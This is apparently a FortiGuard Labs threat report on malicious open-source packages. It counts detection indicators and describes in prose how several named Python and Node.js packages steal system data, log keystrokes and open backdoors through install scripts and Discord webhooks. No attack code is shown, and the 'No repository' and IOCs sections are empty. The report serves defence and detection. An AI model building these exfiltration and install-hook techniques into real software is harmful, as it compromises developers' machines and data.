Overview

Since November 2024, Fortinet's automated threat detection platform has identified multiple malicious software packages, revealing various attack techniques used to exploit system vulnerabilities. These analyses show that attackers are employing methods such as obfuscation and install scripts to bypass traditional security measures. This report provides an overview of the identified threats and the techniques observed, reinforcing the importance of robust detection and security strategies in software environments.

Key Findings

FortiGuard Labs' analysis has identified a range of techniques used by attackers to compromise systems, including both well-known and less common methods:

• 1,082 packages with low file counts, often using minimal code to execute harmful actions undetected.
• 1,052 packages embedding suspicious install scripts designed to silently deploy malicious code during installation.
• 1,043 packages with no repository URL, raising concerns about the legitimacy and traceability of the software.
• 974 packages containing suspicious URLs, potentially facilitating communication with command-and-control servers or data exfiltration.
• 681 packages utilizing suspicious APIs, including commands such as https.get and https.request, to exfiltrate data or perform remote control activities.
• 537 packages with empty descriptions, further obscuring their true intentions and increasing the risk of undetected malicious activity.
• 164 packages with unusually high version numbers, used to mislead users into trusting outdated or potentially harmful software.

Breakdown of Malicious Indicators

1. Low file count

While not necessarily malicious on its own, the majority of detected malicious packages (1,082) exhibit a low file count, often containing minimal code designed to evade detection while enabling exploits such as data theft, unauthorized access, or system compromise. Common indicators include command overwrites, where attackers modify installation commands to introduce malicious code or bypass security, suspicious behavior flagged by machine learning systems due to anomalous patterns, and obfuscation techniques like base64 encoding or encryption to conceal harmful payloads. These tactics combine to create lightweight, evasive threats that are challenging to detect but capable of significant damage.

2. Suspicious install script

While not all install scripts are malicious, threat actors often use them to silently deploy harmful code during installation, sometimes bypassing security checks. These scripts can modify the standard installation process to execute harmful actions without the user’s knowledge. For example, an install script may include HTTP POST requests for data exfiltration, suspicious API calls like https.get or https.request to communicate with external servers, and hardcoded URLs, such as Discord webhooks, for receiving stolen data. These actions suggest the script is setting up a backdoor or preparing the system for further malicious activities, highlighting the need for careful scrutiny of installation scripts to detect and mitigate potential threats.

3. No repository

4. Suspicious URLs

Suspicious URLs are a key indicator of potentially malicious packages, as they are often used to download additional payloads or establish communication with command-and-control (C&C) servers, giving attackers control over infected systems. These URLs may appear legitimate, disguising their harmful intent to evade detection. Common tactics include using shortened or dynamic URLs, hosting malicious content on trusted platforms, or disguising payloads as safe files. In 974 packages, such URLs are linked to the risk of data exfiltration, further malware downloads, and other malicious actions. It is crucial to scrutinize and monitor external URLs in package dependencies to prevent exploitation.

5. Suspicious APIs

While essential for software functionality, APIs can be weaponized by malicious actors to perform harmful activities. In 681 detected cases, suspicious APIs like https.get and https.request were used to exfiltrate data, enable command-and-control (C&C) communication, or obscure malicious intent. These APIs may send sensitive information to remote servers or allow remote control of compromised systems. In one example, the use of https.get and https.request in index.js suggests data exfiltration or communication with external sources, a common tactic in malware. Combined with other red flags, such as suspicious URLs, these API calls indicate the potential for malicious or compromised projects.

Highlighted Attack Cases

Malicious python code targets developers through setup files

Recently discovered malicious Python packages AffineQuant-99.6, amzn-aws-glue-ml-libs-python-6.1.5, and amzn-awsglue-6.1.4, exploit the setup.py file to silently collect system information, including the MAC address, hostname, username, and current directory, and sends this data to remote servers controlled by the attacker. The script uses system commands (getmac for Windows, ifconfig for Linux/macOS) to retrieve the MAC address, base64-encoded it, and send it to hidden URLs. A custom installation process using setuptools to override the installation routine ensures the malicious payload runs after the package is installed. This type of attack has been identified in multiple packages and highlights the risk developers face when installing packages from untrusted sources—potentially leading to stolen credentials, system data, and further attacks. To protect themselves, developers should install packages only from trusted sources, review package content before installation, use virtual environments to isolate installs, scan for vulnerabilities with security tools, and keep dependencies up to date.

Malicious Node.js script harvests sensitive data and sends It to attacker

A malicious script (seller-admin-common_6.5.8, seller-rn-mng-lib_6.5.8. ) is designed to secretly collect sensitive information from a victim’s machine and send it to an external server via a Discord webhook. Upon execution, the script retrieves the internal IP address of the victim’s machine and fetches the external IP address by making an HTTPS request to an online API. It also gathers system details, such as the hostname, username, DNS servers, home directory, and application information. This collected data is then bundled into a JSON object and sent to the attacker’s server, where it can be accessed for further malicious purposes. The combination of internal and external IP addresses, DNS settings, and user details makes the attack highly invasive, enabling attackers to track the victim’s machine and potentially exploit the information for further attacks. Using a Discord webhook adds a layer of stealth, allowing the attacker to collect the stolen data without raising suspicion, making this type of data harvesting ideal for gathering intelligence or executing more targeted cyberattacks.

Malicious JavaScript code downloads and executes harmful software

A recently identified malicious JavaScript code found in the package xeno.dll_1.0.2 utilizes obfuscation techniques to disguise its true intentions. Upon installation, it logs keystrokes to capture private information such as passwords and credit card details, which are then encrypted and sent to a remote server controlled by the attacker. Additionally, the script installs a backdoor that provides remote access with elevated privileges, giving the attacker full control of the system. The backdoor also collects system-specific data, such as the operating system version, installed applications, and network configuration, and sends it to the attacker’s server for future exploitation.

Disguised as a legitimate service, the attacker’s server makes the malicious activity harder to detect. This stealthy combination of keylogging and remote access allows the attacker to steal sensitive data and conduct further attacks, posing a significant threat to the victim's privacy and system integrity.

Conclusion

The data from FortiGuard Labs’ analysis reveals a diverse array of malicious packages, showcasing the wide range of tactics used by cybercriminals. From simple low-file-count packages to complex, multi-layered attacks that involve combining files, network code, and process execution, attackers are leveraging increasingly sophisticated methods to breach systems.

As cybersecurity threats evolve, it’s crucial for organizations and individuals to stay informed about the latest threats. Proactive defense measures such as regular system updates, advanced threat detection, and user education on identifying suspicious activity are essential in mitigating these growing risks.

Stay vigilant and protect your systems from these emerging threats.

Fortinet Protections

FortiGuard AntiVirus detects the malicious files identified in this report as:

AffineQuant-99.6/main.py : Python/Agent.EBC2!tr
affineQuant-99.6: Python/Agent.EBC2!tr
amzn-aws-glue-ml-libs-python-6.1.5/setup.py: Python/Agent.D31D!tr
amzn-aws-glue-ml-libs-python-6.1.5:Python/Agent.D31D!tr
amzn-awsglue-6.1.4/setup.py: Python/Agent.8960!tr
Amzn-awsglue-6.1.4: Python/Agent.8960!tr
seller-admin-common_6.5.8/index.js: JS/Agent.409D!tr
Seller-admin-common_6.5.8: JS/Agent.409D!tr
seller-rn-mng-lib_6.5.8/index.js: JS/Agent.409D!tr
Seller-rn-mng-lib_6.5.8: JS/Agent.409D!tr
xeno.dll_1.0.2/index.js: JS/Agent.B3EF!tr
Xeno.dll_1.0.2: JS/Agent.B3EF!tr

The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running current AntiVirus updates are protected.

The FortiGuard Web Filtering Service detects and blocks the download URLs cited in this report as Malicious.

The FortiDevSec SCA scanner detects malicious packages, including those cited in this report that may operate as dependencies in users' projects in test phases, and prevents those dependencies from being introduced into users' products.

If you believe these or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard Incident Response Team.

IOCs